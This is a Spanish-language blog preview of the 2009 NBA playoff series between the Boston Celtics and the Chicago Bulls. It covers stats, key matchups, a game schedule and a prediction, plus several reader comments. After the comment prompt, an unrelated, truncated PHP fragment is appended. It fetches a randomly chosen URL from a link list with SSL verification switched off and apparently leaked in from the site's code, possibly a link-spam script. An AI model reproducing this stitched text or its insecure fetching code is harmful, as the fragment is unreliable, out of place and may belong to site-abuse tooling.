Análisis PlayOffs 2009 – Este II

18 de April de 2009 por Viva_Dirk

Boston Celtics(2) VS Chicago Bulls(7)

Regular: 2-1, siempre victorias locales

Celtics
P. favor: 100.9
P. contra: 93.4
Ult10: 8-2

Bulls
P. favor 102.2
P. contra 102.4
Ult10: 7-3

La eliminatoria sería de las más desiguales si los Celtics contasen con todos sus efectivos pero si los de Boston no pueden contar en ningún partido con Kevin Garnett, los de Del Negro ven como sus posibilidades suben enteros. A pesar de todos los problema, los verdes se han mostrado como un equipo solvente, con Glenn Davis haciendo un buen papel y las estrellas respondiendo.

Por su parte los Bulls desde la llegada de Salmons y Miller resultan un equipo con mas variantes ofensivas y mas veteranía, lo cual ha liberado un poco a Rose y ha dejado a Gordon en su salsa. Sin Garnett, el casi inexistente juego interior de Boston debería ser superado sin contemplaciones por la tripleta Noah- Thomas-Miller, de mucha más calidad que Perkins, Davis y Moore.

Claves de la eliminatoria

La mas importante, sin duda, será la participación de Garnett en la serie. Con el al 60% los Celtics son clarísimos favoritos.

– Las ayudas que genere Pierce y por lo tanto la capacidad de Salmons para defenderlo en el uno contra uno.

– El duelo de bases. Rose, con mayor peso ofensivo, tendrá que verselas con un Rajon Rondo al que podríamos considerar el mejor defensor de la liga desde la posición de base. Rondo además le exigirá al base de Chicago una actividad física muy alta en defensa.

Anotación desde el banco. Los de Chicago cuentan con Hinrich y Miller dando un buen rendimiento mientras que los Celtics casi deben rezar para que Marbury despierte porque no puede confiar en las actuaciones de Tony Allen y Eddie House es un especialista.

Agenda

– En Boston: Tarde del Sábado 18 a las 18:30 (Hora Española. No hay excusa para perdérselo)
– En Boston: Madrugada del Lunes 20 al Martes 21 a la 1:00.
– En Chicago: Madrugada del Jueves 23 al Viernes 24 a las 2:00.
– En Chicago: Tarde del Domingo 26 a las 19:00

Pronóstico: Bulls 2-4

Comenta

8 comentarios a esta entrada

  1. Jabho dice:
    #1

    Viva, no me lo puedo creer!!!
    Reconozco que el tramo final de los Bulls es bueno y que sin Garnett se iguala el asunto, pero de ahí a ganar…

    Defendemos mejor, mucho mejor. Por dentro Perkins-powe-davís-moore aguantaran más o menos, el juego exterior es mejor el verde y tenemos 2 estrellas consagradas por encima ahora mismo de cualquie jugador de los Bulls.en el banco puede haber algo de ventaja para ellos pero nada más.

    Boston pasa aún sin Garnett y como mucho en 6

      Citar

  2. Gallis dice:
    #2

    Coincido con Jabho…por mucho gran final de los Bulls y por mucha baja de Garnett, los Celtics son los Celtics y Paul Pierce sigue siendo Paul Pierce. Ambos factores igualan la eliminatoria, pero apuesto por un 4-2 para los campeones.

      Citar

  3. kantonyo dice:
    #3

    La verdad que con las adquisiciones de Miller y sobre todo Salmons los Bulls han mejorado bastante, pero yo apuesto por una victoria de Boston en 6. Además creo que en el duelo de bases, Rondo superará a Rose. Además la plantilla de los Bulls a pesar del talento, la veo poco competititva, todo lo contrario a los Celtics, que tiene en sus filas a jugadores como Pierce, que siempre hacen lo correcto en el momento más decisivo.

      Citar

  4. TheDeerHunter dice:
    #4

    estoy con ellos, Viva…
    me creeré que palman los Celtics cuando lo hayan visto mis ojetes

      Citar

  5. Txusma dice:
    #5

    Pues el corazon me dice q los Bulls pueden dar la campanada y cargarse a los verdes. La baja de Garnett es tremenda sobre todo a nivel animico asi q no me extrañaria q los Rose, Gordon, Salmons, Hinrich, Miller, etc… pasaran de ronda.

      Citar

  6. Txusma dice:
    #6

    La primera en la frente!

      Citar

  7. NONAME dice:
    #7

    juas juas, pues va a ser que al final, tenga o no tenga razon el pronostico de Viva, por algo lo decia. Go bullssss!!!

      Citar

  8. telekoman dice:
    #8

    VAya partidito de Rose, madre mía. Y el Allen en lo negativo también es para enmarcar…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>